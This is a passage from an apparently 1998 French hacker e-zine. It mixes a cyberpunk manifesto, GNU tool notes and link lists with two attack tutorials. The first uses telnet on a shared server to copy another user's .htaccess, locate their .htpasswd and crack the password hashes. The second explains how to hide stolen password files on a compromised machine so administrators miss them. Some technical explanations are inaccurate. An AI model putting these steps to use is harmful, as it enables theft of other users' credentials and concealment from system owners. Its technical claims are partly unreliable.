nous sommes dans le rep /home/fred/web

%ls -al

/home/fred/web/.             sys    ..
/home/fred/web/..            sys    ..
/home/fred/web/.htaccess     fred   10Apr98
/home/fred/web/alien.htm     fred   20May98
/home/fred/web/bacc.htm      fred   22Feb98
/home/fred/web/born.gif      fred   01May98
/home/fred/web/boulot.gif    fred   01May98
/home/fred/web/cc.htm        fred   17Jan98
/home/fred/web/hash.gif      fred   19Mar98 
/home/fred/web/parano.gif    fred   30May98 
/home/fred/web/parano.htm    fred   15May98 
...

On note la presence du fichier .htaccess (visible uniquement avec l'option '-a' sur la commande 'ls'). Ce fichier va etre execute quand quelqu'un va demander l'acces a ce rep en utilisant le protocle 'http'... Si le visiteur ne met pas le bon nom de login et le bon pass il ne pourra pas acceder au rep en question (ni a ses sous rep!)

Le fichier .htaccess et ecrit comme suit:

AuthUserFile /home/user/conf/passwd/.htpasswd
AuthGroupFile /dev/null
AuthName ByPassword
AuthType Basic

<limit GET>
require valid-user
</Limit>      

En fait le fichier .htaccess n'est qu'un script qui va aller chercher les mots de pass dans le rep indique a la ligne "AuthUserFile..." soit ici dans le rep /home/user/conf/passwd/.htpasswd 

voila donc comment proceder pour trouver les pass d'un site protege via .htaccess. Il est toutefois necessaire d'avoir un acces telnet sur le meme serveur ...

Tjrs dans la meme optique du manque accru de vigileance dont font preuve les trois quarts des gens, on remarque que souvent ils laissent les reps de leur directory en r-x pour tous ... ce qui nous permet donc de lire facilement les fichiers contenus par ce rep...

Bon vous voulez aller voir ce qu'il y a derriere l'URL
http://machine.server.fr/~fred

malheureusement la procedure .htaccess vous demande un login et un pass(argg!!) pas de panik:) tout s'arrange avec un peu de tactik ....
loggez vous en telnet sur machine.server.fr

% cd /home/fred/web
% ls -al |grep .htaccess
rwxr-xr-x .htaccess  fred  22May98
% cat .htaccess >/home/mon_dir/htaccess_fred

voila vous venez de copier le .htaccess de fred sur votre homedir 
ou vous pourrez facilement le lire (heeh tout est une question de permission)Toute l'embrouille est que au lieu de le copier en faisant un 'cp' normal vous avez redirigez le 'stdout' vers le ficher 'htaccess_fred' dans votre homedir)

editez le maintenant avec vi et regardez ou se trouve le fichier .htpasswd (disons qu'il est dans /home/fred/conf/.htpasswd)
il y'a a peu pres une chance sur deux que fred est applique les meme restrictions a son rep ~/conf vous pouvez donc reiterez l'operation de la meme facon et avoir acces a ses mots de pass (qui seront encodes mais dont le decodage n'est pas tres long vu que le system les encode tjrs de la meme facon....)

==========================================
== Au fait comment creer un htaccess ?? ==
==========================================

hmm okay puisque vous insistez je vais vous expliquer comment creer une restriction d'acces sur son rep (valable seulement en http!)...

Bon avec la commande "AccessFileName" vous pourrez definir un fichier qui jouera le role de .htaccess (c'est la valeur par defaut de la variable "AccessFileName" sur les serveurs apache (et presque tous les autres aussi)...

% AccessFileName .fuck_da_keuf

ainsi c'est le fichier .fuck_da_keuf qui jouera le role de .htaccess
(vous pouvez de cette facon camoufler votre .htaccess pour que personne ne pense a faire ce que je viens d'expliker heeh.... le meilleur nom pour se fichier est 
sans doute quelques chose qui fait nom de fichier system... type: ".logconf" ou encore ".emacs_conf" ou encore ".bash" enfin vous voyez le style koi :)

Bon une fois votre AccessFileName parametre comme il faut vous devez creer le fichier qui va contenir les mots de passes.... celui ci ne DOIT PAS ETRE dans le repertoire ou se trouve le .htaccess! (mettons le dans /home/mon_rep/httpd par
exemple) Pour creer ce fichier (.htpasswd) on utilise le programme "htpasswd" (humm bizare y zont le meme nom ?!) Verfifiez au prealable que ce prog soit bien dans le rep /bin de votre system (auquel cas ca ne risque pas de marcher!)

la syntaxe est simple: on lance tout d'abord htpasswd avec le flag 
'-c' qui veut dire que le system va devoir creer un fichier passé en argument (suivit du premier nom d'utilisateur)

% htpasswd -c .htpasswd moi
Set password for moi:
retype password:

et voila vous pouvez maintenant editer .htpasswd 

% cat .htpasswd 
moi:ZyU8nMQpRyfIM

Pour ajouter de nouveaux utilisateurs il ne faut plus specifier le flag '-c' mais simplement 
%htpasswd .htpasswd utilisateur

et voila le fichier de mot de pass est créé reste a ecire le .htaccess (en fait .fuck_da_keuf) et a le placer dans le rep que l'on veut proteger)

hmmm petit conseil:
Pour eviter qu'un hacker n'est la meme idee que vous et vienne zoner dans le coin de votre .htpasswd vous pouvez rendre ce rep non executable:

%chmod u-rx /home/mon_rep/httpd
%ls -l | grep httpd
drwx------  httpd   moi

et voila il pourra pas y aller !! lol:)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#11#

              TOOLS FOR A
               ____    __    __   __  __
              / ___\  |  \  |  | |  ||  |
             / /      |   \ |  | |  ||  |
            | |    _  |    \   | |  ||  |
             \ \__| | |  |\    | |      |
              \____/  |__| \___|  \____/
                           
                                  GENERATION


-=[iXtlan]=-
  (k)1998


Bon si vous etes acroches a fenetre95 c'est pas la pein de lire ce qui suit! Non sans blaque! Le projet GNU est un environnement logiciel entierment dedie a Unix et plus precisement Linux....

hey non c'est pas GENERATION NEXT (y'a pas les spices girls la!!!)

C'est la Free Software Fondation (FSF) qui a developpe le projet GNU. il s'agit de tout un ensemble de logiciels entierement gratuits et dont les sources sont disponibles et modifiables pas n'importe qui (deja on s'eloigne de windows la)...La plus part des produits qui ont aboutis du projet GNU se retrouvenst sur les differentes distributions de Linux (RedHat, Debian, Kheops,..) mais sont 
completements adaptés aux plateformes unix les plus puissantes qui soit...

[plateforme]--- [ machine ] ---------[ company ]----------[web]
 SunOS           Sun Sparc        Sun Microsystem     www.sun.com
 Solaris         Sun Sparc        Sun Microsystem     www.sun.com
 HP-UX           HP 9000/700      Helwet Packard      www.hp.com
 AIX 3           IBM RS/6000      IBM                 www.ibm.com
 IRIX            SGI              Sillicon Graphics   www.sgi.com
 Digital Unix    DEC Alpha        Digital             www.digital.com

comme vous le voyez les programmes du projet GNU s'adaptent parfaitement aux machines puissantes et aux OS performants (on est carrement loin de winNT la!!!)
Mais encore mieux que cela les sources du GNU sont des programmes haut de gamme et souvent les plus evolues et les plus aboutis.
voici une liste de programmes du projet GNU

[programme] --------[ description ]
 GNU Emacs            editeur de texte 
 GCC                  compilateur C et C++
 GNU library          bibliotheques
 GDB                  debugger
 RCS                  outil de gestion de versions
 GNU make             gestion des compilations
 gprof                outil de mesure des performances

tous ces programmes sont implementes en serie sur la plus part des unix et sont extremement utilises dans le monde des programmeurs .... 
A quand un tel projet pour le monde windoze (koi ?? ki s'est qui a dit jamais!?:)

-----------
Note: pour en savoir plus lisez "programmer avec les outils GNU"
edition O'Reilly (c) 1997 
150frs (ouai je sais c'est cher mais bon y'a un CD avec tous les outils dessus!)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#12#                                                             iXtlan (k) 1998

              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]
              [   DA ]--[  CYBERPUNK  ]--[  REVOLUTION   ]


!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 
!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 
!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 
!!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! REVOLT !!! 


Le terme de cyberpunk designe la contre-culture qui naqui a la fin des annees 80' en reaction a la mollesse de la culture dominante: les Yuppies!

C'est Timothy Leary qui explique sans doute le mieux ce qu'est un cyberpunk dans son live "Chaos et Cyber culture" (editions du Lezard... tient c'est eux aussi qui ont edite des bookins comme "E comme Extacy" ou "Du chocolat a la morphine"...:) 
T. Leary concoit les choses de la facon suivante:
pour lui il y a tjrs eu dans l'histoire occidentale un CULTURE DOMINANTE et une CONTRE CULTURE (née en réaction a la premiere)
Mais plus interessant encore il compare l'evolution culturel et sociale de l'homme avec la vitesse a laquelle le cerveau est capable d'operer (vitesse de communication externe du cerveau)
voici le shema sur lequel il aboutit:

CONTRE
CULTURE       BEATNIKS            HIPPIES             CYBERPUNKS
---------   ------------        ------------         ------------
CULTURE     CONFORMISTES        GENS NORMAUX           YUPPIES
DOMINANTE
---------------------------------------------------------------------
            |                                               /
           1250                                     [internet]
            |                                          _/
            |                                        _/
            |                                  [realite virtuelle]
            |                                      /
PUISSANCE  1000                                 ,,/   
DU          |                                  /[scanner]
CERVEAU     |                                 / [multimedia 2D]
            |                                / 
=           |                              ./[CDrom]
            |                           ,,/[DOS]
REALITES   750                         / [VHS]
TRAITEES    |                   [ordi personnel]
PAR         |                      ,,,/
JOUR        |                 _,,,/
            |               ,/
            |             ;'[unix]
           500      [tv couleur]
            |        ,;/
            |     ,;/
            |   ,/[psychedeliques]
            | ,/
            |/
           250 [tv N&B]
---------------------------------------------------------------------
           1950         1965         1980             1993


Leary fait un rapprochement directe entre les differents moyens de communication existants (accessibles par un large public) et la vitesse a laquelle cerveau humain est capble de reagir... Il est vrai que l'homme moderne doit gerer dans un journee des plus banales tout un tas d'informations qui lui arrivent au cerveau
(spot de pub, conduite, micro informatik, GSM, internet,etc...) 

C'est la ou l'on voit se developper deux cultures differentes:

- La premiere: La CULTURE DOMINANTE integre les nouvelle     fonctionnalites du monde teknik dans le seul but de gagner un peu   plus de thune ou d'accroitre son pouvoir.

- La deuxieme: La CONTRE CULTURE elle essaye de maitriser les   nouvelles teknologies dans le but de parfaire son evolution,   d'aller plus vite, plus loins, mieux....

Il n'y a qu'a voir la facon dont l'informatik est enseigne dans les facultes et IUT pour se rendre compte de la "betise" dont fait preuve la culture Yuppie! 
Au lieu de nous faire decouvrir un monde, un rezo, un univers, un system, une pensee, ils nous inculquent sauvagement des principes mathematiques, des regles sociales, des concepts economiques, comme s'ils voulaient nous dresser a agir comme de sombre moutons...

Lors d'une discution avec le responsable du departement informatique d'un lieu dont je tairais le nom (oh et puis non! c'est l IUT de Nice dept info sous la tutelle de Jack Lemaire) voila ce que je me suis vu repondre lorsque j'approuvais mon desagrement quant aux methodes dont font preuves les profs: 
"L'IUT est la pour vous forger a la vie active, vous modeler dans la societe economique moderne!"
FUUUUUUUCKKKKKK non mais kel konnerie!!! et puis quoi encore !
"vous modeler" ??? non mais j'halucine ! Il est temp lecteur que tu te reveiles du commat dans lequel le monde occidental, moderne, developpe, teknokrat t'as plonge! Bordel c'est nous qui devons modeler la societe de demain et non celle d'hier qui doit faire de nous des zombies!!

voila pourquoi je refuse (et j'espere que toi aussi) le system universitaire europeen! les hackers sont le type meme des gens refusant la soumission a un ordre donne! Si on me dit que je ne doit pas aller a tel endroit comptes sur moi pour y etre dans les cinq minutes qui suivent!!!

voila c'etait le coup de gueule du cyberpunk (un peu stoned c'est vrai:) la suite dans le numero 2 de KaotiX (surment un article sur NEUROMANCIEN de William Gibson ;P hehe....


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#13#
                   ____________     _____
   _________      /            \___| ses |___________________
  |         |____/  planquer  ______              ___________\
  |  comment ________________/      |   données  /
  |_________|                       |___________/
                                                \
                                                 \   ___________
                                                  \ /          /
                                                   |iXtlan 1998]
                                                    \__________\


Il est fort probable qu'un jour dans votre vie vous ayez a cacher des donnees sur un system.... pourquoi ?? ben simplement parcque vous n'etes pas cense posseder ces donnees et qu'en attendant une expedition des dites donnees vers un lieu plus sur (diskette, zip, cdrom, etc.) vous devez les laisser sur le disk que vous venez de hacker... Imaginez la gueule de l'admin si il trouve dans votre homedir un fichier comportant tous les mots de passes de tous les utilisateurs du system??!!! ou bien une copy de son repetoir personnel avec la clef du root ?!!! hmmm vous risquez fort de 
recevoir vite fait un mail du dit admin qui sera pas content du tout (et pire si l'admin est un batard fini vous risquez de finir en taule!!)pas cool tout ca non? donc le mieux est de cacher les donnees extirpées chez autrui... suivant les OS il y'a plusieurs methodes:


**** Ou le cacher?

Il est evident qu'il vaut mieux cacher un fichier bien profond sur un disk plutot qu'a la racine meme du system! Donc si possible planquer votre fichier bien loin, dans plusieurs repetroire loin, loin, de la racine... En plus certain system lance dans l'autoexec.bat (ou l'equivalent) un scan de la racine donc rappellez vous bien ca: 
NE PLANQUEZ JAMAIS UN FILE A LA RACINE MEME D'UN DISK!

**** Comment le nommer?

Il arrive parfois que le fichier que vous devez cacher ne puisse pas etre renommer auquel cas placer le alors dans un rep qui fasse repertoir sys (type "TEMP" ou "SYS")... Bon si vous pouvez renommez le fichier alors utilisez un nom qui fasse la encore nom de fichier temporaire (*.tmp *.$$$) ou alors fichier system (reginfo.dat system.idx ....) si vous etes en fac le mieux et peut etre encore
un nom du style td_system.txt ou exo01.asm enfin quelque chose dans le style qui n'incitera pas un admin a aller regarder ce qu'il y a dedans! ceci dit eviter les fichier .txt de 50 Mo ou les .dll de 1Ko ca fait pas serieux et s'il l'admin a les yeux en face des trous il verra tout de suite l'astuce! 

Enfin il est recommander si c'est possible (dans le cas d'un fichier pass par ex)de crypter ce qu'il contient a l'aide d'un encodeur quelconque. A noter que l'encoder PGP permet d'insere un fichier quelconque dans un autre fichier bcp moins confidentiel (ex Jpeg, Gif, Bmp, etc...) cool non :)

**** cacher un fichier dans un autre fichier 
[merci NeurAlien!;)

Un fichier .txt se fini normalement par un  CR, LF (retour a la ligne) CR, LF en hexadecimal ca donne "0D 0A 1A"...
voici l'astuce qu'a trouve NeurAlien pour planquer du texte (ou meme un DLL ou une image ou koi que ce soit) dans un fichier txt!

editer le fichier text dans lequel vous voulez cacher l'autre fichier 
et ajouter "0D 0A 1A" a la fin puis le contenu du fichier a planque!
terrible !! ni EDIT ni TYPE ni un affichage avec un editeur n'affichera la fin du fichier!! comme koi un ordi quand on lui dit d'arreter de lire un texte il obeit au doigt et a l'oeil (heheh:)

voici en pratique ce que ca donne

(sous DOS)
% dir
fichier.txt   [fichier normal] 
secret.txt    [fichier a planquer]

voila comment faire

% edit fichier.txt

mettez du texte tout ce qu'il y a de plus anodin
patati patata ...XXX^Z

(remplacer les trois X par "0D 0A 1A" 
puis sauvegarder le fichier)	

% COPY fichier.txt + secret.txt /b readme.txt
% del secret.txt fichier.txt
% dir
readme.txt 

et voila personne ne verra rien a part peut etre la taille du fichier par rapport aux nombres de carracteres mais en general les admins ne sont pas assez futes pour aller chercher jusque la! ;-)

Sous unix les choses sont plus simples car les fichiers acceptent des noms tres tres longs avec tous les carracteres ascii possibles!
donc on peut creer un fichier facilement innacessible et y mettre ses codes penard (enfin faites gaffe qd meme on sait jamais!)

% cat "file    "
voici la liste complete des pass sur machine.server.fr 
hehe :)
^D
on vient donc de creer un fichier du nom de "file"
(enfin apparement en tout cas....)
Car l'admin qui va se pointer son nez histoire de voir vos dernieres bidouilles et lui y vas pas comprendre du tout! hehe:)
%ls -al
rwxr-xr-x  file    moi
%cat file
No such file or directory
%rm file
No such file or directory

hmmm hehehe voila l'astuce le fichier ne s'appelle pas "file" mais "file   " (avec les espaces) et ca ce con d'admin il peut pas le deviner!

Y'a aussi la possibilite sous unix de planquer ses donnees dans des rep caches 

% mkdir .rep

et voila le repetroire ".rep" n'est visible qu'avec l'option '-a'
le mieux etant encore de combiner le tout (rep cache, file cache, et nom avec espace et carracteres ascii en prime!)

voila pour aujourd'hui dans le prochain numero y'aura comment planquer des files dans un GIF ou un EXE (hehe interessant ca !) 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#14#              

                  ___   __  _  __  ____  ___   ____
            THE  / _ \ |  \| ||  || __ \/ _ \ |  _/ PROJECT
                /     \|     ||  ||    /     \| >_
               /___|___\_|\__||__||_|__\__|___\___\

                   ...for a free cyberspace....



Le projet ANIRAE est ne de mon esprit tordu (un soir un peu plus stoned que les autres surment)... je me suis dit que ce qui se passait dans ma tete par rapport au "grand rezo" devait aussi se passer dans la tete d'autres keums, sur la planete, ailleurs,... D'ou l'idee de donner naissance a un lieu de ralliement, une corporation des esprits "connected"...

"people got to get ... connected...." (Bjork)

C'est ca! etre connectes avec les autres "networked brains", pouvoir bouger, voyager, vivre a donf, tout en restant en relation avec d'autres gens dans le meme esprit que nous via l'Internet! Le projet ANIRAE n'est pas une organisation, encore moins une association et definitement pas une company! mais simplement une alliance (kind a union) entre divers nomades du rezo qui veulent avoir un endroit ou exprimer leur propos, parler de ce qui se passe dans leurs tetes, 
montrer leurs dernieres creations,...

Ces cyberpunks (voir article n°12) comme le dit Leary, doivent s'allier pour developper la contre-culture qui renversera le system de pensee teknokrate dans lequel le monde moderne est en train de s'engouffrer....

"Bow down before the one you serve 
 you gonna get what you deserve..." (NIN)

tel pourrait etre la devise de ces YUPPIES inclinés devant les lumieres mirobolantes du dieu Dollars. Mais heureusment il existe encore une minorité pensante sur terre, une contre culture capable de develloper des systems alternatifs (Linux), de communiquer rapidement via le rezo (mail et IRC), de propager son message artistique via les connexions numeriques mondiales (Live en RealAudio (GoodDog;-), infographie 2D/3D sur le rezo, texte et these online, 
....

Actuellement le projet ANIRAE est encore tres limité mais je compte sur vous lecteurs pour faire en sorte qu'il se developpe et deviennent vite un espace de rencontre et d'echange des "Networked Brains" (les esprits connectes!)Tout ce qui est digital peut faire partie du rezo (images, textes, sons, photos, films, fichiers divers, programmes, scripts,.....) 
Le site web sera bientot online sur http://anirae.azur.net/ et le channel IRC est deja ouvert #anirae sur UNDERNET. 

alors si ca vous chauffe de tenter une experience qui va vous faire directement plonger dans le XXIème siècle envoyez moi un mail (klh@mygale.org) avec un article coup de gueule, des conseils, des idees, des sons, des RBS, des images, tout ce que vous voulez pourvu que ce soit vous qui l'ayez fait!


Take a walk on da network!
a bientot sur le rezo...

                                             -=[ iXtlan ]=-
                                            (klh@mygale.org)


PS: dans le prochain numero de KaotiX je vous expliquerez d'ou vient toute cette philosophie chelou ;-) hehe 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#15#


                     _(((((((( + ))))))))))_
                   _(                       )_
                  (_      LINKZ ON DA WEB    _)
                    (_______________________)



voici quelques liens pas mal du tout a visiter soit pour leurs contenus hautement instructifs, ou pour les fichiers a downloader, ou simplement pour le fun...

[ HACK ] 
http://www.2600.com/ 	              
http://www.paranoia.com/
http://www.biodome.org/
http://www.EliteHackers.org/
http://www.micros0ft.com/
[francais]
http://rafale.certix.fr/~lloeb/main/underground.html
http://www.micronet.fr/~darcelf/
http://www.mygale.org/02/hckclan/


[ IRC ]
http://www.mygale.org/~klh
http://www.irc-scripts.org/
http://www.scriptingcrypt.com/
http://www.kombo.com/irc/
http://www.phantasy.com/~markm/bitchx/
http://scripts.bitchx.com/
http://irc.simplenet.com/

[ Linux ]
http://www.linux.org/
http://www.rootshell.com/
http://www.debian.org/
http://www.redhat.com/
http://www.linux-kheops.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#16#
                                ________
                             __/        \__
                            /              \
                         -=[ REMERCIEMENTS  ]=-
                            \_            _/
                              \_        _/
                                \      /
  _______________________________|    |______________________________
  @                                                                 @
  @  merci a....                                                    @
  @  NeurAlien et la Noway Team, 2600, hack-tic, Dan farme, Weste   @
  @  Venema, Sir Hackalot, Franken Gide, New Times, Hackers Corp,   @
  @  Teamothy Leary, William Gibson, HighTimes, GanjaMan, psyk0,    @
  @  delix, tot0, skel, bc, lahire (hahaha!), meat, pyramid, Linus  @
  @  Torvarld, les editions O'Reily (GNU) et MacMillan (Linux!),    @
  @  aussi #hackteach, #hack, #hackers, #klh_warscripts et #anirae  @
  @  et bien sur un grand merci a Bill Gates pour le rire qu'il fait@
  @  naitre en moi a chaque fois que je vois ca tronche!            @
  @_________________________________________________________________@
         


    Ce document a ete ecrit par iXtlan le 1er juin 98 (ptin le jour    ce leve!! non!... trop bon .... vite vite ou est mon gueu....lol:)


/!/ more infos at klh@mygale.org
/!/ http://anirae.azur.net
/!/ #anirae on Undrenet

 
 #######[]#################################################[]#######
 #######[   ---------------------------------------------   ]#######
 #######[  kopywrong (k) nEtWoRKed bRaiN hAcKeRs cOrp. 1998 ]#######
 #######[   ---------------------------------------------   ]#######
 #######[]#################################################[]#######